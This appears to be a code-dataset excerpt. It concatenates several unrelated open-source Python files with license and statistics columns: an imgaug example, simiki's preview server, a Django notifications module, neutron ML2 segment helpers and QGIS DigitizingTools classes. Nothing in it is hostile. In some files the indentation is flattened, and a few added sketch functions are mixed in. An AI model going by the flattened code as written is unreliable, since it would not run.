astronaut_text = ia.draw_text(astronaut, x=0, y=0, text="%d" % (counter,), color=[0, 255, 0], size=16)
batch_images.append(astronaut_text)
batch_kps.append(kps)
counter += 1
batch = ia.Batch(
images=np.array(batch_images, dtype=np.uint8),
keypoints=batch_kps
)
yield batch
def draw_grid(images_aug, keypoints_aug):
if keypoints_aug is None:
keypoints_aug = []
for bidx in range(len(images_aug)):
keypoints_aug.append([None for image in images_aug[bidx]])
images_kps_batches = []
for bidx in range(len(images_aug)):
images_kps_batch = []
for image, kps in zip(images_aug[bidx], keypoints_aug[bidx]):
if kps is None:
image_kps = image
else:
image_kps = kps.draw_on_image(image, size=5, color=[255, 0, 0])
images_kps_batch.append(image_kps)
images_kps_batches.extend(images_kps_batch)
grid = ia.draw_grid(images_kps_batches, cols=len(images_aug[0]))
return grid
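def minimal_background_example():
    # A hedged sketch distilled from main() above: the smallest useful
    # augment_batches(background=True) loop. Image shapes are arbitrary,
    # and this assumes ia.Batch accepts images without keypoints.
    seq = iaa.Sequential([iaa.Fliplr(0.5)])
    batches = [ia.Batch(images=np.zeros((4, 64, 64, 3), dtype=np.uint8))
               for _ in range(3)]
    for batch_aug in seq.augment_batches(batches, background=True):
        print(batch_aug.images_aug.shape)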
if __name__ == "__main__":
main()
|
mit
| 4,145,880,567,530,394,600
| 33.0625
| 114
| 0.592355
| false
| 3.333333
| false
| false
| false
|
tankywoo/simiki
|
simiki/server.py
|
1
|
4414
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function, absolute_import, unicode_literals
import os
import os.path
import sys
import logging
import traceback
from simiki.compat import is_py2, unicode
try:
import SimpleHTTPServer as http_server
except ImportError:
# py3
import http.server as http_server
try:
import SocketServer as socket_server
except ImportError:
# py3
import socketserver as socket_server
try:
import urllib2 as urllib_request
except ImportError:
# py3
import urllib.request as urllib_request
try:
from os import getcwdu
except ImportError:
# py3
from os import getcwd as getcwdu
URL_ROOT = None
PUBLIC_DIRECTORY = None
class Reuse_TCPServer(socket_server.TCPServer):
allow_reuse_address = True
class YARequestHandler(http_server.SimpleHTTPRequestHandler):
def translate_path(self, path):
"""map url path to local file system.
path and return path are str type
in py3, builtin translate_path input is str(but it's unicode) and
return str. so there is no need to do with codecs, system can locate
file with unicode path.
in py2, buildin translate_path input is str and return str. we need
to decode to unicode and then encode path with filesystemencoding(),
as mentioned above, unicode path can be located, but will have problem
with py2's translate_path, for uniformity, we also return the
corresponding type of translate_path in manual part.
TODO:
- fspath with os.sep from url always slash
- URL_ROOT codecs simplify?
- in the end of if body use super translate_path directly?
"""
path = urllib_request.unquote(path)
if not isinstance(path, unicode):
path = path.decode('utf-8')
fsenc = sys.getfilesystemencoding()
if is_py2:
path = path.encode(fsenc)
if URL_ROOT and self.path.startswith(URL_ROOT):
if self.path == URL_ROOT or self.path == URL_ROOT + '/':
fspath = os.path.join(PUBLIC_DIRECTORY, 'index.html')
if is_py2:
fspath = fspath.encode(fsenc)
else:
_url_root = urllib_request.unquote(URL_ROOT)
if not isinstance(_url_root, unicode):
_url_root = _url_root.decode('utf-8')
if is_py2:
_url_root = _url_root.encode(fsenc)
fspath = os.path.join(
PUBLIC_DIRECTORY.encode(fsenc), path[len(_url_root) + 1:]) # noqa: E501
else:
fspath = os.path.join(
PUBLIC_DIRECTORY, path[len(_url_root) + 1:])
return fspath
else:
return http_server.SimpleHTTPRequestHandler \
.translate_path(self, path)
def do_GET(self):
# redirect url
if URL_ROOT and not self.path.startswith(URL_ROOT):
self.send_response(301)
self.send_header('Location', URL_ROOT + self.path)
self.end_headers()
http_server.SimpleHTTPRequestHandler.do_GET(self)
def preview(path, url_root, host='127.0.0.1', port=8000):
"""
:param path: directory path relative to current path
    :param url_root: `root` set in _config.yml
"""
global URL_ROOT, PUBLIC_DIRECTORY
if not host:
host = '127.0.0.1'
if not port:
port = 8000
if url_root.endswith('/'):
url_root = url_root[:-1]
URL_ROOT = urllib_request.quote(url_root.encode('utf-8'))
PUBLIC_DIRECTORY = os.path.join(getcwdu(), path)
if os.path.exists(path):
os.chdir(path)
else:
        logging.error("Path {} does not exist".format(path))
try:
Handler = YARequestHandler
httpd = Reuse_TCPServer((host, port), Handler)
except (OSError, IOError) as e:
logging.error("Could not listen on port {0}\n{1}"
.format(port, traceback.format_exc()))
sys.exit(getattr(e, 'exitcode', 1))
logging.info("Serving at: http://{0}:{1}{2}/".format(host, port, url_root))
logging.info("Serving running... (Press CTRL-C to quit)")
try:
httpd.serve_forever()
except (KeyboardInterrupt, SystemExit):
logging.info("Shutting down server")
httpd.socket.close()
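# A hedged usage sketch (not part of the original module): serve the build
# output directly. The 'output' directory and '/wiki' root are assumptions
# mirroring typical simiki settings, not values read from _config.yml here.
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    preview(path='output', url_root='/wiki', host='127.0.0.1', port=8000)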
|
mit
| 1,257,562,507,566,963,700
| 31.218978
| 96
| 0.607612
| false
| 3.899293
| false
| false
| false
|
haystack/eyebrowse-server
|
notifications/models.py
|
1
|
7781
|
from __future__ import unicode_literals
from __future__ import print_function
import base64
import datetime
from django.db import models
from django.db.models.query import QuerySet
from django.core.exceptions import ImproperlyConfigured
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import get_language, activate
from django.utils.encoding import python_2_unicode_compatible
from django.utils.six.moves import cPickle as pickle # pylint: disable-msg=F
from notifications.compat import AUTH_USER_MODEL, GenericForeignKey
from notifications.conf import settings
from notifications.utils import load_media_defaults, notice_setting_for_user, my_import
from notifications.backends.email import EmailBackend
NOTICE_MEDIA, NOTICE_MEDIA_DEFAULTS = load_media_defaults()
class LanguageStoreNotAvailable(Exception):
pass
@python_2_unicode_compatible
class NoticeType(models.Model):
label = models.CharField(_("label"), max_length=40, unique=True)
display = models.CharField(_("display"), max_length=50)
description = models.CharField(_("description"), max_length=100)
# by default only on for media with sensitivity less than or equal to this
# number
default = models.IntegerField(_("default"))
def __str__(self):
return self.label
class Meta:
verbose_name = _("notice type")
verbose_name_plural = _("notice types")
@classmethod
def create(cls, label, display, description, default=2, verbosity=1):
"""
Creates a new NoticeType.
        This is intended to be used by other apps as a post_syncdb management step.
"""
try:
notice_type = cls._default_manager.get(label=label)
updated = False
if display != notice_type.display:
notice_type.display = display
updated = True
if description != notice_type.description:
notice_type.description = description
updated = True
if default != notice_type.default:
notice_type.default = default
updated = True
if updated:
notice_type.save()
if verbosity > 1:
print("Updated %s NoticeType" % label)
except cls.DoesNotExist:
cls(label=label, display=display,
description=description, default=default).save()
if verbosity > 1:
print("Created %s NoticeType" % label)
class Notification(models.Model):
recipient = models.ForeignKey(User, related_name="notification_recipient")
sender = models.ForeignKey(User, related_name="notification_sender")
    # Pass the callable (not its result) so the timestamp is evaluated on
    # each save rather than once at import time.
    date_created = models.DateTimeField(default=datetime.datetime.utcnow)
notice_type = models.ForeignKey(NoticeType)
seen = models.BooleanField(default=False)
url = models.URLField(max_length=300, blank=False, null=True)
message = models.CharField(max_length=2000, blank=False, null=True)
class NoticeSetting(models.Model):
"""
Indicates, for a given user, whether to send notifications
of a given type to a given medium.
"""
user = models.ForeignKey(AUTH_USER_MODEL, verbose_name=_("user"))
notice_type = models.ForeignKey(NoticeType, verbose_name=_("notice type"))
medium = models.CharField(_("medium"), max_length=1, choices=NOTICE_MEDIA)
send = models.BooleanField(_("send"), default=False)
scoping_content_type = models.ForeignKey(
ContentType, null=True, blank=True)
scoping_object_id = models.PositiveIntegerField(null=True, blank=True)
scoping = GenericForeignKey("scoping_content_type", "scoping_object_id")
@classmethod
def for_user(cls, user, notice_type, medium, scoping=None):
"""
        Kept for backwards compatibility but isn't used anywhere within this app
@@@ consider deprecating
"""
return notice_setting_for_user(user, notice_type, medium, scoping)
class Meta:
verbose_name = _("notice setting")
verbose_name_plural = _("notice settings")
unique_together = (
"user", "notice_type", "medium", "scoping_content_type", "scoping_object_id")
class NoticeQueueBatch(models.Model):
"""
A queued notice.
Denormalized data for a notice.
"""
pickled_data = models.TextField()
def get_notification_language(user):
"""
Returns site-specific notification language for this user. Raises
LanguageStoreNotAvailable if this site does not use translated
notifications.
"""
if settings.PINAX_NOTIFICATIONS_LANGUAGE_MODEL:
model = settings.PINAX_NOTIFICATIONS_GET_LANGUAGE_MODEL()
try:
language = model._default_manager.get(user__id__exact=user.id)
if hasattr(language, "language"):
return language.language
except (ImportError, ImproperlyConfigured, model.DoesNotExist):
raise LanguageStoreNotAvailable
raise LanguageStoreNotAvailable
def send_now(users, label, extra=None, sender=None, scoping=None):
"""
Creates a new notice.
This is intended to be how other apps create new notices.
    notification.send(user, "friends_invite_sent", {
        "spam": "eggs",
        "foo": "bar",
    })
"""
sent = False
if extra is None:
extra = {}
notice_type = NoticeType.objects.get(label=label)
current_language = get_language()
for user in users:
# get user language for user from language store defined in
# NOTIFICATION_LANGUAGE_MODULE setting
try:
language = get_notification_language(user)
except LanguageStoreNotAvailable:
language = None
if language is not None:
# activate the user's language
activate(language)
# Since we only have 1 medium, just hardcode it in (was getting some weird
# 'module' object is not callable error)
backend = EmailBackend(0)
if backend.can_send(user, notice_type, scoping=scoping):
backend.deliver(user, sender, notice_type, extra)
sent = True
# reset environment to original language
activate(current_language)
return sent
def send(*args, **kwargs):
"""
A basic interface around both queue and send_now. This honors a global
flag NOTIFICATION_QUEUE_ALL that helps determine whether all calls should
be queued or not. A per call ``queue`` or ``now`` keyword argument can be
used to always override the default global behavior.
"""
queue_flag = kwargs.pop("queue", False)
now_flag = kwargs.pop("now", False)
assert not (
queue_flag and now_flag), "'queue' and 'now' cannot both be True."
if queue_flag:
return queue(*args, **kwargs)
elif now_flag:
return send_now(*args, **kwargs)
else:
if settings.PINAX_NOTIFICATIONS_QUEUE_ALL:
return queue(*args, **kwargs)
else:
return send_now(*args, **kwargs)
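def _example_invite_notification(sender_user, recipient):
    """Hedged sketch: assumes a "friends_invite_sent" NoticeType was already
    registered via NoticeType.create(); the label and extra dict are
    illustrative only."""
    # Deliver immediately, ignoring PINAX_NOTIFICATIONS_QUEUE_ALL:
    send([recipient], "friends_invite_sent",
         extra={"from": sender_user.username}, sender=sender_user, now=True)
    # Or defer into a NoticeQueueBatch drained by an external worker:
    send([recipient], "friends_invite_sent",
         extra={"from": sender_user.username}, sender=sender_user, queue=True)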
def queue(users, label, extra=None, sender=None):
"""
    Queue the notification in NoticeQueueBatch. This allows large numbers of
    user notifications to be deferred to a separate process running outside
    the webserver.
"""
if extra is None:
extra = {}
if isinstance(users, QuerySet):
users = [row["pk"] for row in users.values("pk")]
else:
users = [user.pk for user in users]
notices = []
for user in users:
notices.append((user, label, extra, sender))
NoticeQueueBatch(
pickled_data=base64.b64encode(pickle.dumps(notices))).save()
|
mit
| 4,718,777,562,124,167,000
| 33.127193
| 89
| 0.658399
| false
| 4.244954
| false
| false
| false
|
eayunstack/neutron
|
neutron/plugins/ml2/drivers/helpers.py
|
1
|
7033
|
# Copyright (c) 2014 Thales Services SAS
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
from neutron_lib import context as neutron_ctx
from neutron_lib.plugins.ml2 import api
from neutron_lib.utils import helpers
from oslo_config import cfg
from oslo_db import exception as db_exc
from oslo_log import log
from neutron.common import exceptions as exc
from neutron.db import api as db_api
from neutron.objects import base as base_obj
from neutron.plugins.common import utils as p_utils
LOG = log.getLogger(__name__)
IDPOOL_SELECT_SIZE = 100
class BaseTypeDriver(api.ML2TypeDriver):
"""BaseTypeDriver for functions common to Segment and flat."""
def __init__(self):
try:
self.physnet_mtus = helpers.parse_mappings(
cfg.CONF.ml2.physical_network_mtus, unique_values=False
)
except Exception as e:
LOG.error("Failed to parse physical_network_mtus: %s", e)
self.physnet_mtus = []
def get_mtu(self, physical_network=None):
return p_utils.get_deployment_physnet_mtu()
class SegmentTypeDriver(BaseTypeDriver):
"""SegmentTypeDriver for segment allocation.
    Provides helper methods to allocate segments that are fully or partially
    specified.
"""
def __init__(self, model):
super(SegmentTypeDriver, self).__init__()
if issubclass(model, base_obj.NeutronDbObject):
self.model = model.db_model
else:
self.model = model
self.primary_keys = set(dict(self.model.__table__.columns))
self.primary_keys.remove("allocated")
    # TODO(ataraday): get rid of this method when the old TypeDriver is no longer used
def _get_session(self, arg):
if isinstance(arg, neutron_ctx.Context):
return arg.session, db_api.context_manager.writer.using(arg)
return arg, arg.session.begin(subtransactions=True)
def allocate_fully_specified_segment(self, context, **raw_segment):
"""Allocate segment fully specified by raw_segment.
If segment exists, then try to allocate it and return db object
If segment does not exists, then try to create it and return db object
If allocation/creation failed, then return None
"""
network_type = self.get_type()
session, ctx_manager = self._get_session(context)
try:
with ctx_manager:
alloc = (
session.query(self.model).filter_by(**raw_segment).
first())
if alloc:
if alloc.allocated:
# Segment already allocated
return
else:
# Segment not allocated
LOG.debug("%(type)s segment %(segment)s allocate "
"started ",
{"type": network_type,
"segment": raw_segment})
count = (session.query(self.model).
filter_by(allocated=False, **raw_segment).
update({"allocated": True}))
if count:
LOG.debug("%(type)s segment %(segment)s allocate "
"done ",
{"type": network_type,
"segment": raw_segment})
return alloc
# Segment allocated or deleted since select
LOG.debug("%(type)s segment %(segment)s allocate "
"failed: segment has been allocated or "
"deleted",
{"type": network_type,
"segment": raw_segment})
# Segment to create or already allocated
LOG.debug("%(type)s segment %(segment)s create started",
{"type": network_type, "segment": raw_segment})
alloc = self.model(allocated=True, **raw_segment)
alloc.save(session)
LOG.debug("%(type)s segment %(segment)s create done",
{"type": network_type, "segment": raw_segment})
except db_exc.DBDuplicateEntry:
# Segment already allocated (insert failure)
alloc = None
LOG.debug("%(type)s segment %(segment)s create failed",
{"type": network_type, "segment": raw_segment})
return alloc
def allocate_partially_specified_segment(self, context, **filters):
"""Allocate model segment from pool partially specified by filters.
Return allocated db object or None.
"""
network_type = self.get_type()
session, ctx_manager = self._get_session(context)
with ctx_manager:
select = (session.query(self.model).
filter_by(allocated=False, **filters))
            # the selected segment can be allocated by someone else before our
            # update, so fetch a pool of candidates and pick one at random
allocs = select.limit(IDPOOL_SELECT_SIZE).all()
if not allocs:
# No resource available
return
alloc = random.choice(allocs)
raw_segment = dict((k, alloc[k]) for k in self.primary_keys)
LOG.debug("%(type)s segment allocate from pool "
"started with %(segment)s ",
{"type": network_type,
"segment": raw_segment})
count = (session.query(self.model).
filter_by(allocated=False, **raw_segment).
update({"allocated": True}))
if count:
LOG.debug("%(type)s segment allocate from pool "
"success with %(segment)s ",
{"type": network_type,
"segment": raw_segment})
return alloc
# Segment allocated since select
LOG.debug("Allocate %(type)s segment from pool "
"failed with segment %(segment)s",
{"type": network_type,
"segment": raw_segment})
            # save the real exception in case we exceed the allowed number of attempts
raise db_exc.RetryRequest(
exc.NoNetworkFoundInMaximumAllowedAttempts())
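class _ExampleVlanTypeDriver(SegmentTypeDriver):
    """Hedged sketch (not part of the original module): the minimal concrete
    driver needed to exercise the helpers above. The real VLAN driver lives
    elsewhere in ml2; the model passed at construction would be its
    allocation model class.
    """
    def get_type(self):
        return 'vlan'

# Usage, roughly (context is an admin request context; the kwargs name
# columns of the allocation model; 'VlanAllocation' is illustrative):
#   driver = _ExampleVlanTypeDriver(VlanAllocation)
#   alloc = driver.allocate_fully_specified_segment(
#       context, physical_network='physnet1', vlan_id=100)
#   alloc = driver.allocate_partially_specified_segment(
#       context, physical_network='physnet1')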
|
apache-2.0
| 3,381,965,087,420,021,000
| 39.188571
| 78
| 0.550974
| false
| 4.800683
| false
| false
| false
|
bstroebl/DigitizingTools
|
tools/dttools.py
|
1
|
49803
|
# -*- coding: utf-8 -*-
"""
dttools
`````````````
"""
"""
Part of DigitizingTools, a QGIS plugin that
subsumes different tools needed during digitizing sessions
* begin : 2013-02-25
* copyright : (C) 2013 by Bernhard Ströbl
* email : bernhard.stroebl@jena.de
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
from builtins import range
from builtins import object
from qgis.PyQt import QtGui, QtCore, QtWidgets
from qgis.core import *
from qgis.gui import *
import dtutils
class DtTool(object):
'''Abstract class; parent for any Dt tool or button'''
def __init__(self, iface, geometryTypes, **kw):
self.iface = iface
self.canvas = self.iface.mapCanvas()
#custom cursor
self.cursor = QtGui.QCursor(QtGui.QPixmap(["16 16 3 1",
" c None",
". c #FF0000",
"+ c #FFFFFF",
" ",
" +.+ ",
" ++.++ ",
" +.....+ ",
" +. .+ ",
" +. . .+ ",
" +. . .+ ",
" ++. . .++",
" ... ...+... ...",
" ++. . .++",
" +. . .+ ",
" +. . .+ ",
" ++. .+ ",
" ++.....+ ",
" ++.++ ",
" +.+ "]))
self.geometryTypes = []
self.shapeFileGeometryTypes = []
# ESRI shapefile does not distinguish between single and multi geometries
# source of wkbType numbers: http://gdal.org/java/constant-values.html
for aGeomType in geometryTypes:
if aGeomType == 1: # wkbPoint
self.geometryTypes.append(1)
self.shapeFileGeometryTypes.append(4)
self.geometryTypes.append(-2147483647) #wkbPoint25D
self.shapeFileGeometryTypes.append(-2147483647)
elif aGeomType == 2: # wkbLineString
self.geometryTypes.append(2)
self.shapeFileGeometryTypes.append(5)
self.geometryTypes.append(-2147483646) #wkbLineString25D
self.shapeFileGeometryTypes.append(-2147483646)
elif aGeomType == 3: # wkbPolygon
self.geometryTypes.append(3)
self.shapeFileGeometryTypes.append(6)
self.geometryTypes.append(-2147483645) #wkbPolygon25D
self.shapeFileGeometryTypes.append(-2147483645)
elif aGeomType == 4: # wkbMultiPoint
self.geometryTypes.append(4)
self.shapeFileGeometryTypes.append(1) # wkbPoint
self.geometryTypes.append(-2147483644) #wkbMultiPoint25D
self.shapeFileGeometryTypes.append(-2147483647) #wkbPoint25D
elif aGeomType == 5: # wkbMultiLineString
self.geometryTypes.append(5)
self.shapeFileGeometryTypes.append(2) # wkbLineString
self.geometryTypes.append(-2147483643) #wkbMultiLineString25D
self.shapeFileGeometryTypes.append(-2147483646) #wkbLineString25D
elif aGeomType == 6: # wkbMultiPolygon
self.geometryTypes.append(6)
self.shapeFileGeometryTypes.append(6) # wkbPolygon
self.geometryTypes.append(-2147483642) #wkbMultiPolygon25D
self.shapeFileGeometryTypes.append(-2147483645) #wkbPolygon25D
def allowedGeometry(self, layer):
'''check if this layer's geometry type is within the list of allowed types'''
if layer.dataProvider().storageType() == u'ESRI Shapefile': # does not distinguish between single and multi
result = self.shapeFileGeometryTypes.count(layer.wkbType()) >= 1
else:
result = self.geometryTypes.count(layer.wkbType()) == 1
return result
def geometryTypeMatchesLayer(self, layer, geom):
'''check if the passed geom's geometry type matches the layer's type'''
match = layer.wkbType() == geom.wkbType()
if not match:
if layer.dataProvider().storageType() == u'ESRI Shapefile':
# does not distinguish between single and multi
match = (layer.wkbType() == 1 and geom.wkbType() == 4) or \
(layer.wkbType() == 2 and geom.wkbType() == 5) or \
(layer.wkbType() == 3 and geom.wkbType() == 6) or \
(layer.wkbType() == 4 and geom.wkbType() == 1) or \
(layer.wkbType() == 5 and geom.wkbType() == 2) or \
(layer.wkbType() == 6 and geom.wkbType() == 3)
else:
# are we trying a single into a multi layer?
match = (layer.wkbType() == 4 and geom.wkbType() == 1) or \
(layer.wkbType() == 5 and geom.wkbType() == 2) or \
(layer.wkbType() == 6 and geom.wkbType() == 3)
return match
def isPolygonLayer(self, layer):
''' check if this layer is a polygon layer'''
polygonTypes = [3, 6, -2147483645, -2147483642]
result = layer.wkbType() in polygonTypes
return result
    def debug(self, msg):
        title = "DigitizingTools Debugger"
        QgsMessageLog.logMessage(title + "\n" + msg)
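# A hedged reference sketch of the wkb codes DtTool tracks above. The 25D
# variant is the base code with the 0x80000000 dimension flag set, which is
# why it prints as a large negative int when read as signed 32-bit.
WKB_CODE_PAIRS = {
    'Point': (1, -2147483647),
    'LineString': (2, -2147483646),
    'Polygon': (3, -2147483645),
    'MultiPoint': (4, -2147483644),
    'MultiLineString': (5, -2147483643),
    'MultiPolygon': (6, -2147483642),
}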
class DtSingleButton(DtTool):
'''Abstract class for a single button
icon [QtGui.QIcon]
tooltip [str]
    geometryTypes [array:integer] 1=point, 2=line, 3=polygon (wkb geometry type codes)'''
def __init__(self, iface, toolBar, icon, tooltip, geometryTypes = [1, 2, 3], dtName = None):
super().__init__(iface, geometryTypes)
self.act = QtWidgets.QAction(icon, tooltip, self.iface.mainWindow())
self.act.triggered.connect(self.process)
if dtName != None:
self.act.setObjectName(dtName)
self.iface.currentLayerChanged.connect(self.enable)
toolBar.addAction(self.act)
self.geometryTypes = geometryTypes
def process(self):
raise NotImplementedError("Should have implemented process")
def enable(self):
'''Enables/disables the corresponding button.'''
# Disable the Button by default
self.act.setEnabled(False)
layer = self.iface.activeLayer()
if layer != None:
#Only for vector layers.
if layer.type() == QgsMapLayer.VectorLayer:
if self.allowedGeometry(layer):
self.act.setEnabled(layer.isEditable())
try:
layer.editingStarted.disconnect(self.enable) # disconnect, will be reconnected
except:
pass
try:
layer.editingStopped.disconnect(self.enable) # when it becomes active layer again
except:
pass
layer.editingStarted.connect(self.enable)
layer.editingStopped.connect(self.enable)
class DtSingleTool(DtSingleButton):
'''Abstract class for a tool'''
def __init__(self, iface, toolBar, icon, tooltip, geometryTypes = [0, 1, 2], crsWarning = True, dtName = None):
super().__init__(iface, toolBar, icon, tooltip, geometryTypes, dtName)
self.tool = None
self.act.setCheckable(True)
self.canvas.mapToolSet.connect(self.toolChanged)
def toolChanged(self, thisTool):
if thisTool != self.tool:
self.deactivate()
def deactivate(self):
if self.tool != None:
self.tool.reset()
self.reset()
self.act.setChecked(False)
def reset(self):
pass
class DtSingleEditTool(DtSingleTool):
'''Abstract class for a tool for interactive editing'''
def __init__(self, iface, toolBar, icon, tooltip, geometryTypes = [0, 1, 2], crsWarning = True, dtName = None):
super().__init__(iface, toolBar, icon, tooltip, geometryTypes, dtName)
self.crsWarning = crsWarning
self.editLayer = None
def reset(self):
self.editLayer = None
def enable(self):
'''Enables/disables the corresponding button.'''
# Disable the Button by default
doEnable = False
layer = self.iface.activeLayer()
if layer != None:
            if layer.type() == QgsMapLayer.VectorLayer:  # only for vector layers
if self.allowedGeometry(layer):
doEnable = layer.isEditable()
try:
layer.editingStarted.disconnect(self.enable) # disconnect, will be reconnected
except:
pass
try:
layer.editingStopped.disconnect(self.enable) # when it becomes active layer again
except:
pass
layer.editingStarted.connect(self.enable)
layer.editingStopped.connect(self.enable)
if self.editLayer != None: # we have a current edit session, activeLayer may have changed or editing status of self.editLayer
if self.editLayer != layer:
try:
self.editLayer.editingStarted.disconnect(self.enable) # disconnect, will be reconnected
except:
pass
try:
self.editLayer.editingStopped.disconnect(self.enable) # when it becomes active layer again
except:
pass
self.tool.reset()
self.reset()
if not doEnable:
self.deactivate()
if doEnable and self.crsWarning:
layerCRSSrsid = layer.crs().srsid()
mapSet = self.canvas.mapSettings()
projectCRSSrsid = mapSet.destinationCrs().srsid()
if layerCRSSrsid != projectCRSSrsid:
self.iface.messageBar().pushWarning("DigitizingTools", self.act.toolTip() + " " +
QtWidgets.QApplication.translate("DigitizingTools",
"is disabled because layer CRS and project CRS do not match!"))
doEnable = False
self.act.setEnabled(doEnable)
class DtDualTool(DtTool):
'''Abstract class for a tool with interactive and batch mode
icon [QtGui.QIcon] for interactive mode
tooltip [str] for interactive mode
iconBatch [QtGui.QIcon] for batch mode
tooltipBatch [str] for batch mode
    geometryTypes [array:integer] 1=point, 2=line, 3=polygon (wkb geometry type codes)'''
def __init__(self, iface, toolBar, icon, tooltip, iconBatch, tooltipBatch, geometryTypes = [1, 2, 3], dtName = None):
super().__init__(iface, geometryTypes)
self.iface.currentLayerChanged.connect(self.enable)
self.canvas.mapToolSet.connect(self.toolChanged)
#create button
self.button = QtWidgets.QToolButton(toolBar)
self.button.clicked.connect(self.runSlot)
self.button.toggled.connect(self.hasBeenToggled)
#create menu
self.menu = QtWidgets.QMenu(toolBar)
if dtName != None:
self.menu.setObjectName(dtName)
self.menu.triggered.connect(self.menuTriggered)
self.button.setMenu(self.menu)
self.button.setPopupMode(QtWidgets.QToolButton.MenuButtonPopup)
# create actions
self.act = QtWidgets.QAction(icon, tooltip, self.iface.mainWindow())
if dtName != None:
self.act.setObjectName(dtName + "Action")
self.act.setToolTip(tooltip)
self.act_batch = QtWidgets.QAction(iconBatch, tooltipBatch, self.iface.mainWindow())
if dtName != None:
self.act_batch.setObjectName(dtName + "BatchAction")
self.act_batch.setToolTip(tooltipBatch)
self.menu.addAction(self.act)
self.menu.addAction(self.act_batch)
# set the interactive action as default action, user needs to click the button to activate it
self.button.setIcon(self.act.icon())
self.button.setToolTip(self.act.toolTip())
self.button.setCheckable(True)
self.batchMode = False
# add button to toolBar
toolBar.addWidget(self.button)
self.geometryTypes = geometryTypes
# run the enable slot
self.enable()
def menuTriggered(self, thisAction):
if thisAction == self.act:
self.batchMode = False
self.button.setCheckable(True)
if not self.button.isChecked():
self.button.toggle()
else:
self.batchMode = True
if self.button.isCheckable():
if self.button.isChecked():
self.button.toggle()
self.button.setCheckable(False)
self.runSlot(False)
self.button.setIcon(thisAction.icon())
self.button.setToolTip(thisAction.toolTip())
def toolChanged(self, thisTool):
if thisTool != self.tool:
self.deactivate()
def hasBeenToggled(self, isChecked):
raise NotImplementedError("Should have implemented hasBeenToggled")
def deactivate(self):
if self.button != None:
if self.button.isChecked():
self.button.toggle()
def runSlot(self, isChecked):
if self.batchMode:
layer = self.iface.activeLayer()
if layer.selectedFeatureCount() > 0:
self.process()
else:
if not isChecked:
self.button.toggle()
def process(self):
raise NotImplementedError("Should have implemented process")
def enable(self):
# Disable the Button by default
self.button.setEnabled(False)
layer = self.iface.activeLayer()
if layer != None:
#Only for vector layers.
if layer.type() == QgsMapLayer.VectorLayer:
# only for certain layers
if self.allowedGeometry(layer):
if not layer.isEditable():
self.deactivate()
self.button.setEnabled(layer.isEditable())
try:
layer.editingStarted.disconnect(self.enable) # disconnect, will be reconnected
except:
pass
try:
layer.editingStopped.disconnect(self.enable) # when it becomes active layer again
except:
pass
layer.editingStarted.connect(self.enable)
layer.editingStopped.connect(self.enable)
else:
self.deactivate()
class DtDualToolSelectFeature(DtDualTool):
'''Abstract class for a DtDualToo which uses the DtSelectFeatureTool for interactive mode'''
def __init__(self, iface, toolBar, icon, tooltip, iconBatch, tooltipBatch, geometryTypes = [1, 2, 3], dtName = None):
super().__init__(iface, toolBar, icon, tooltip, iconBatch, tooltipBatch, geometryTypes, dtName)
self.tool = DtSelectFeatureTool(iface)
def featureSelectedSlot(self, fids):
        if len(fids) > 0:
self.process()
def hasBeenToggled(self, isChecked):
try:
self.tool.featureSelected.disconnect(self.featureSelectedSlot)
# disconnect if it was already connected, so slot gets called only once!
except:
pass
if isChecked:
self.canvas.setMapTool(self.tool)
self.tool.featureSelected.connect(self.featureSelectedSlot)
else:
self.canvas.unsetMapTool(self.tool)
class DtDualToolSelectPolygon(DtDualToolSelectFeature):
'''Abstract class for a DtDualToo which uses the DtSelectFeatureTool for interactive mode'''
def __init__(self, iface, toolBar, icon, tooltip, iconBatch, tooltipBatch, geometryTypes = [3, 6], dtName = None):
super().__init__(iface, toolBar, icon, tooltip, iconBatch, tooltipBatch, geometryTypes, dtName)
self.tool = DtSelectPolygonTool(iface)
class DtDualToolSelectVertex(DtDualTool):
'''Abstract class for a DtDualTool which uses the DtSelectVertexTool for interactive mode
    numVertices [integer] number of vertices to be snapped until the vertexFound signal is emitted'''
def __init__(self, iface, toolBar, icon, tooltip, iconBatch, tooltipBatch, geometryTypes = [1, 2, 3], numVertices = 1, dtName = None):
super().__init__(iface, toolBar, icon, tooltip, iconBatch, tooltipBatch, geometryTypes, dtName)
self.tool = DtSelectVertexTool(self.iface, numVertices)
def hasBeenToggled(self, isChecked):
try:
self.tool.vertexFound.disconnect(self.vertexSnapped)
# disconnect if it was already connected, so slot gets called only once!
except:
pass
if isChecked:
self.canvas.setMapTool(self.tool)
self.tool.vertexFound.connect(self.vertexSnapped)
else:
self.canvas.unsetMapTool(self.tool)
def vertexSnapped(self, snapResult):
raise NotImplementedError("Should have implemented vertexSnapped")
class DtDualToolSelectRing(DtDualTool):
'''
Abstract class for a DtDualTool which uses the DtSelectRingTool for interactive mode
'''
def __init__(self, iface, toolBar, icon, tooltip, iconBatch,
tooltipBatch, geometryTypes = [1, 2, 3], dtName = None):
super().__init__(iface, toolBar, icon, tooltip,
iconBatch, tooltipBatch, geometryTypes, dtName)
self.tool = DtSelectRingTool(self.iface)
def hasBeenToggled(self, isChecked):
try:
self.tool.ringSelected.disconnect(self.ringFound)
# disconnect if it was already connected, so slot gets called only once!
except:
pass
if isChecked:
self.canvas.setMapTool(self.tool)
self.tool.ringSelected.connect(self.ringFound)
else:
self.canvas.unsetMapTool(self.tool)
def ringFound(self, selectRingResult):
raise NotImplementedError("Should have implemented ringFound")
class DtDualToolSelectGap(DtDualTool):
'''
Abstract class for a DtDualTool which uses the DtSelectGapTool for interactive mode
'''
def __init__(self, iface, toolBar, icon, tooltip, iconBatch,
tooltipBatch, geometryTypes = [1, 2, 3], dtName = None,
allLayers = False):
super().__init__(iface, toolBar, icon, tooltip,
iconBatch, tooltipBatch, geometryTypes, dtName)
self.tool = DtSelectGapTool(self.iface, allLayers)
def hasBeenToggled(self, isChecked):
try:
self.tool.gapSelected.disconnect(self.gapFound)
